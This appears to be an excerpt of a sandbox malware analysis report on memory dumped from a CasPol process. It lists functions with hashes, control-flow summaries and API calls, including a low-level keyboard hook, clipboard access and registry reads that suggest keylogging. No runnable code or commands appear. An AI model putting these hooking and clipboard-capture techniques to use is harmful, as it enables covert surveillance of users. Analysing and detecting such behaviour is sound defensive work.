                                                                                                    • Instruction ID: 809d4118228c8670a33f58591de14ad4c0bba6599e00419898e85245fd3e69e1
                                                                                                    • Opcode Fuzzy Hash: 30f457c47ac0ffca2f0bf3012a73ee035600091deee14016938e11b57aacd546
                                                                                                    • Instruction Fuzzy Hash: 0E322BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C49E37, Relevance: 2.0, APIs: 1, Instructions: 501libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 8d51492b652a23632d973f5666cc138eda9a82208ac22befae85d0022c359c84
                                                                                                    • Instruction ID: 0ccd0ee28389b038d06fe29cca9437e9edf6f441b481a3dd9107b18e44e0eac0
                                                                                                    • Opcode Fuzzy Hash: 8d51492b652a23632d973f5666cc138eda9a82208ac22befae85d0022c359c84
                                                                                                    • Instruction Fuzzy Hash: 68322BB4A09224CFCB64DF70C89869DB7B6BF88305F2185EAD509A3354DB349E81DF46
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110AE68, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 11531 110ae68-110aeb4 LdrInitializeThunk 11535 110aebb-110aec7 11531->11535 11536 110b0c8-110b0db 11535->11536 11537 110aecd-110aed6 11535->11537 11538 110b102-110b106 11536->11538 11539 110aedc-110aef1 11537->11539 11540 110b0fd 11537->11540 11541 110b111 11538->11541 11542 110b108 11538->11542 11545 110aef3-110af06 11539->11545 11546 110af0b-110af26 11539->11546 11540->11538 11544 110b112 11541->11544 11542->11541 11544->11544 11547 110b09c-110b0a0 11545->11547 11554 110af34 11546->11554 11555 110af28-110af32 11546->11555 11548 110b0a2 11547->11548 11549 110b0ab-110b0ac 11547->11549 11548->11549 11549->11536 11556 110af39-110af3b 11554->11556 11555->11556 11557 110af55-110afed 11556->11557 11558 110af3d-110af50 11556->11558 11576 110affb 11557->11576 11577 110afef-110aff9 11557->11577 11558->11547 11578 110b000-110b002 11576->11578 11577->11578 11579 110b004-110b006 11578->11579 11580 110b046-110b09a 11578->11580 11581 110b014 11579->11581 11582 110b008-110b012 11579->11582 11580->11547 11584 110b019-110b01b 11581->11584 11582->11584 11584->11580 11585 110b01d-110b044 11584->11585 11585->11580
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 77a5d8dc883b4df156e89cfef59d2e789593bc0d10cfbbab17eb2fd8428fdfca
                                                                                                    • Instruction ID: 9811aa2e6e92cd90a4d80ab5688f2af02c3f135d3fa7193c186d7966f1724be9
                                                                                                    • Opcode Fuzzy Hash: 77a5d8dc883b4df156e89cfef59d2e789593bc0d10cfbbab17eb2fd8428fdfca
                                                                                                    • Instruction Fuzzy Hash: D261B538E14319DBDB19DFB4C4997AE7BB1AF44304F108C28E502A7295DFB9AC45CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00FFA9E0, Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 11852 ffa9e0-ffaa4b LdrInitializeThunk 11860 ffab94-ffabb1 11852->11860 11861 ffaa51-ffaa6b 11852->11861 11873 ffabb6-ffabbf 11860->11873 11861->11860 11864 ffaa71-ffaa8b 11861->11864 11868 ffaa8d-ffaa8f 11864->11868 11869 ffaa91 11864->11869 11870 ffaa94-ffaaef call ff89f4 11868->11870 11869->11870 11880 ffaaf5 11870->11880 11881 ffaaf1-ffaaf3 11870->11881 11882 ffaaf8-ffab92 call ff89f4 11880->11882 11881->11882 11882->11873
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5662150696.0000000000FF0000.00000040.00000010.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_ff0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 2f7d13529b44d7666428b29fe65f8334772604bc104a9c8e03a27baad508c927
                                                                                                    • Instruction ID: a905da5e760409ac1cb3cb0ec7529477869d7963998d06c4b028006072107a52
                                                                                                    • Opcode Fuzzy Hash: 2f7d13529b44d7666428b29fe65f8334772604bc104a9c8e03a27baad508c927
                                                                                                    • Instruction Fuzzy Hash: D751A775B002099FCB04EFB4C885AAEB7B5BF88714F158D69E5069B291DF74EC04CB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00FFA9DB, Relevance: 1.6, APIs: 1, Instructions: 140libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5662150696.0000000000FF0000.00000040.00000010.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_ff0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ba2e8e1395da16c6680fc76c292b4e67e5446735a69ed2fb9a2705e86b2956ca
                                                                                                    • Instruction ID: 268aa500840a778045c0abd7a7d82e37dda104d79b9a1210ddeeaf5fdaa7e6dd
                                                                                                    • Opcode Fuzzy Hash: ba2e8e1395da16c6680fc76c292b4e67e5446735a69ed2fb9a2705e86b2956ca
                                                                                                    • Instruction Fuzzy Hash: B751A575A002099FCB04EFB4C885AAE77F5BF88304F158D69E5069B291DF74AC04CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110C58F, Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c4d291f27679a3f906cef2e217c988f2491895de3c7153c81fcd76c830b9d238
                                                                                                    • Instruction ID: 38ffae52b80f1774e8b417522ea938b3ccf79ff6df65fb065c6b12381d71ccad
                                                                                                    • Opcode Fuzzy Hash: c4d291f27679a3f906cef2e217c988f2491895de3c7153c81fcd76c830b9d238
                                                                                                    • Instruction Fuzzy Hash: 7D412271E043498FCB15CFB9C8146EEBBB1AFCA214F148AAAD444A7291DB789944CBD1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE66ED, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCE680A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: dbe79c9641aa5a1cf4b49b23358a37630b37ff0c9ad457b133ed6cd7f6964319
                                                                                                    • Instruction ID: e8ea14bac113b94dcb6e21aa28b393fa2ca44d942045aebab172693d52ab8dc8
                                                                                                    • Opcode Fuzzy Hash: dbe79c9641aa5a1cf4b49b23358a37630b37ff0c9ad457b133ed6cd7f6964319
                                                                                                    • Instruction Fuzzy Hash: 4D51D0B1D103199FDF14CFA9C884ADEBFB1BF88350F20862AE419AB210D771A945CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE4344, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DCE680A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 716092398-0
                                                                                                    • Opcode ID: c4535a6fb7149261a3c674e5d9f4635def2fa82803db52156370ee35e41f77e4
                                                                                                    • Instruction ID: ade9b3b9fee2325fa875603a7ddd1ffd9dcb94378189d6f3f7782914ad20deb5
                                                                                                    • Opcode Fuzzy Hash: c4535a6fb7149261a3c674e5d9f4635def2fa82803db52156370ee35e41f77e4
                                                                                                    • Instruction Fuzzy Hash: FD51B1B1D10309DFDB14CF99C884ADEBFB5BF48354F20852AE419AB210D771A945CF91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110B45F, Relevance: 1.6, APIs: 1, Instructions: 111registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0110B564
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 3141a55cdac74a92a233cb8d2e48b9b4e65155fa4c1a5ef04f2c391feff8a0c9
                                                                                                    • Instruction ID: 7a1ccac7d0f3e7a5b1c3825dcbb4cb717da29bc9a3ada2a50746b82ca8dce7ec
                                                                                                    • Opcode Fuzzy Hash: 3141a55cdac74a92a233cb8d2e48b9b4e65155fa4c1a5ef04f2c391feff8a0c9
                                                                                                    • Instruction Fuzzy Hash: 344188B4E043498FDB05CFA8C544A9EFFF5AF49304F28C5AAE408AB341C7B69945CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110ADC7, Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 4f7eaf881b22b7aed7d94c48adca54939fbdf55e7cc2291677841bbe5dc4c606
                                                                                                    • Instruction ID: c91146755c31fb29de76d16f09416f4162eb4c1083f947b22e62938ee96a312d
                                                                                                    • Opcode Fuzzy Hash: 4f7eaf881b22b7aed7d94c48adca54939fbdf55e7cc2291677841bbe5dc4c606
                                                                                                    • Instruction Fuzzy Hash: 5D41E934B09308DFD70ADB79D498AAE7BB1AF85304F1188A9E001DB297DB75DC46CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00D3DB74, Relevance: 1.6, APIs: 1, Instructions: 106threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5660951123.0000000000D3D000.00000040.00000001.sdmp, Offset: 00D3D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_d3d000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: TerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1852365436-0
                                                                                                    • Opcode ID: ee35fd15a565bd6a83ccd9faef2df6d1ade23b5d9fcf63feb3a167a721075dfb
                                                                                                    • Instruction ID: 10fd28bbf1f5594d11c8413681f2d0f4ac84cf79a0e9911888b48e1cba3d4464
                                                                                                    • Opcode Fuzzy Hash: ee35fd15a565bd6a83ccd9faef2df6d1ade23b5d9fcf63feb3a167a721075dfb
                                                                                                    • Instruction Fuzzy Hash: A931E874204355CFDB648F34E5D9B957BA3AF25324F2881A9ED858F196C331C895CF22
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCEA124, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DCEB579
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallProcWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2714655100-0
                                                                                                    • Opcode ID: c7cf1250c554eb48fa686f30c6d6050f98409f7599294d5421e7c9150a29022c
                                                                                                    • Instruction ID: 57fef030eeb5c7ffc1833303633adfe907dda6cd9ccc050ea2bf043c33e25c1b
                                                                                                    • Opcode Fuzzy Hash: c7cf1250c554eb48fa686f30c6d6050f98409f7599294d5421e7c9150a29022c
                                                                                                    • Instruction Fuzzy Hash: 2A4138B4A00249CFCB10CF99C884AAABBF5FF88314F148859D519AB321C775A940CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C46A24, Relevance: 1.6, APIs: 1, Instructions: 96comclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 220874293-0
                                                                                                    • Opcode ID: 0dd31e89ad31d1aa97eb779273695b3cfdf604117454e71f2c7a73793351e243
                                                                                                    • Instruction ID: a87da9719034818d458240cc1d837698bd620c8705c7e5dd91ae5e802ae4f979
                                                                                                    • Opcode Fuzzy Hash: 0dd31e89ad31d1aa97eb779273695b3cfdf604117454e71f2c7a73793351e243
                                                                                                    • Instruction Fuzzy Hash: B84158B0A01249DFDB10CFE9D885BDDBBF5FF49718F14842AD504AB290DB706945CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 01107A30, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0110B7D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: fb041f99c67f1b66591ffd40cae7eb78fa4e430192ec288341ad1461448a7b3b
                                                                                                    • Instruction ID: a4ad534159b10b373b8280c4d2556a23d86c1b75e66addb1674ae9afd94545c4
                                                                                                    • Opcode Fuzzy Hash: fb041f99c67f1b66591ffd40cae7eb78fa4e430192ec288341ad1461448a7b3b
                                                                                                    • Instruction Fuzzy Hash: 693103B5D042589FCB14CF99C884A9EBBF5BF48300F15842AE918AB350C7709904CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110B70D, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0110B7D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3660427363-0
                                                                                                    • Opcode ID: fa47acb2d22184bd99931b307fa6c1baebffb0b026bc3db1d94eb5848f66e501
                                                                                                    • Instruction ID: a78e8d88ff6a6e1fa44bb51e35609104431d319381f2e5a2a8ff867c80093238
                                                                                                    • Opcode Fuzzy Hash: fa47acb2d22184bd99931b307fa6c1baebffb0b026bc3db1d94eb5848f66e501
                                                                                                    • Instruction Fuzzy Hash: 9B41F2B5D052589FCB24CFA9C884A9EFFF5BF48314F15842AE818AB350C774A904CF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 01107A24, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0110B564
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID:
                                                                                                    • API String ID: 71445658-0
                                                                                                    • Opcode ID: 11bdb82ff903b198ab92de3eb848c01e1c76d872d59a0c6fa938545cf6c210d1
                                                                                                    • Instruction ID: ed4b969e037e7a37c224655ce021e2268192d343bb776b332a2b1108008118cd
                                                                                                    • Opcode Fuzzy Hash: 11bdb82ff903b198ab92de3eb848c01e1c76d872d59a0c6fa938545cf6c210d1
                                                                                                    • Instruction Fuzzy Hash: 6A3101B4D042489FDB14CFA9C584A8EFFF5BF48304F24856AE409AB381C7B6A944CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C461B8, Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5659285625.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c40000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard
                                                                                                    • String ID:
                                                                                                    • API String ID: 220874293-0
                                                                                                    • Opcode ID: 16e24fd423c2b11c2dcc72ac6c01f4ef432b78c0dda48c668335669130727b4c
                                                                                                    • Instruction ID: e4007b2a65853f45a7cef915e459efd950227e63e2c8e44a6eea4dcc19ae933d
                                                                                                    • Opcode Fuzzy Hash: 16e24fd423c2b11c2dcc72ac6c01f4ef432b78c0dda48c668335669130727b4c
                                                                                                    • Instruction Fuzzy Hash: 7D3102B0901208DFDB20CF99C984BDEBBF5FF49704F208029E504BB294DBB46945CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE9F54, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DCEA5B6,?,?,?,?,?), ref: 1DCEA677
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: ea89e344534294f17f58aaae328bc9b85d98f8748644b0c779f366df30769d06
                                                                                                    • Instruction ID: 4524e5a76f74ca3daa5a0d69e16cbb67f1f45c37b3b5fbda82f16e6d2a1243a8
                                                                                                    • Opcode Fuzzy Hash: ea89e344534294f17f58aaae328bc9b85d98f8748644b0c779f366df30769d06
                                                                                                    • Instruction Fuzzy Hash: 9F21F4B59002089FCB10CFAAD884ADEBBF8EF49310F14841AE914A7210D374A944CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCEA5EA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DCEA5B6,?,?,?,?,?), ref: 1DCEA677
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DuplicateHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 3793708945-0
                                                                                                    • Opcode ID: dc55c99561bcb02c50264777fb59b0f6561af22949106cc6ce664335e1a7fea8
                                                                                                    • Instruction ID: 40c6b5adb08698eb21253105e72bb85e0b81ad349a0ac34ddccf93c55520cacb
                                                                                                    • Opcode Fuzzy Hash: dc55c99561bcb02c50264777fb59b0f6561af22949106cc6ce664335e1a7fea8
                                                                                                    • Instruction Fuzzy Hash: 8E2103B5D012489FCB10CFAAD880AEEBFF8EF49310F10841AE955A3350C378A944CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 1DCE5221, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1DCE52B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5683699457.000000001DCE0000.00000040.00000001.sdmp, Offset: 1DCE0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1dce0000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 4139908857-0
                                                                                                    • Opcode ID: 74603686f567e252b2652f1bf7bd05ca5549f277764e59fc00bcf882646b7995
                                                                                                    • Instruction ID: e43ab2880177c858314d93b819d919112a2949d298530c8865f64a1dde93f9ed
                                                                                                    • Opcode Fuzzy Hash: 74603686f567e252b2652f1bf7bd05ca5549f277764e59fc00bcf882646b7995
                                                                                                    • Instruction Fuzzy Hash: 1C2190B1D093898FCB12CFA9C444ADEBFF0AF8A214F04859EC495A7252C374A545CFA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0110DEB0, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0110DF33
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5663391450.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_1100000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HookWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2559412058-0
                                                                                                    • Opcode ID: 5f74bc2c7cade19493904d8978b891f87ff2112b3805e7ff398f5e1f85b33097
                                                                                                    • Instruction ID: bd563051600780515c68d4a994be625e7aad8d7400240f3f77c571c3853559f2
                                                                                                    • Opcode Fuzzy Hash: 5f74bc2c7cade19493904d8978b891f87ff2112b3805e7ff398f5e1f85b33097
                                                                                                    • Instruction Fuzzy Hash: 9C2112B1D002089FCB14CFA9D944BEEBBF4BF88314F10842AE419A7250CBB4A941CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C00BAC, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(00000000,00000000), ref: 00C023C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5658708804.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c00000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 134000473-0
                                                                                                    • Opcode ID: 5a04c3f5ece678795840481de7e607f170555616f693c1e4421bb954b14acd6c
                                                                                                    • Instruction ID: a4b76b1fefef0eaad71da7f7144fc3c553c07f2477af48dc1fb5fcb218dd3fb6
                                                                                                    • Opcode Fuzzy Hash: 5a04c3f5ece678795840481de7e607f170555616f693c1e4421bb954b14acd6c
                                                                                                    • Instruction Fuzzy Hash: AC2115B58013098FCB10CF9AD488ADEFBF4BF89314F10852ED419B7650C379AA44CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C051E0, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00C051C1,00000800), ref: 00C05252
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5658708804.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c00000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: b9d8f63dabba7989495ade7241348860b8f64a0efa60e9fecba37e1968455cd6
                                                                                                    • Instruction ID: 29970093bb65a62d156716b6a7e73f12359ef956db5e9351b7beb13d9d0be821
                                                                                                    • Opcode Fuzzy Hash: b9d8f63dabba7989495ade7241348860b8f64a0efa60e9fecba37e1968455cd6
                                                                                                    • Instruction Fuzzy Hash: 902136B68003488FCF10CFAAC444ADEFBF4AF89314F14841ED415AB240C375A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00C0234B, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindWindowW.USER32(00000000,00000000), ref: 00C023C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.5658708804.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_c00000_CasPol.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FindWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 134000473-0
                                                                                                    • Opcode ID: 9e00faa8d641119683ee1737482bef3ae2a38487b4a3665829909eefa3f5d812
                                                                                                    • Instruction ID: c19215b6cd1b037cb2639ffa80fd5d32be23083079c8f5784467129113da0517
                                                                                                    • Opcode Fuzzy Hash: 9e00faa8d641119683ee1737482bef3ae2a38487b4a3665829909eefa3f5d812
                                                                                                    • Instruction Fuzzy Hash: B721E0B5C013098FCB14CF9AD888ADEFBF4BF89314F14852ED459A7650C379AA44CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

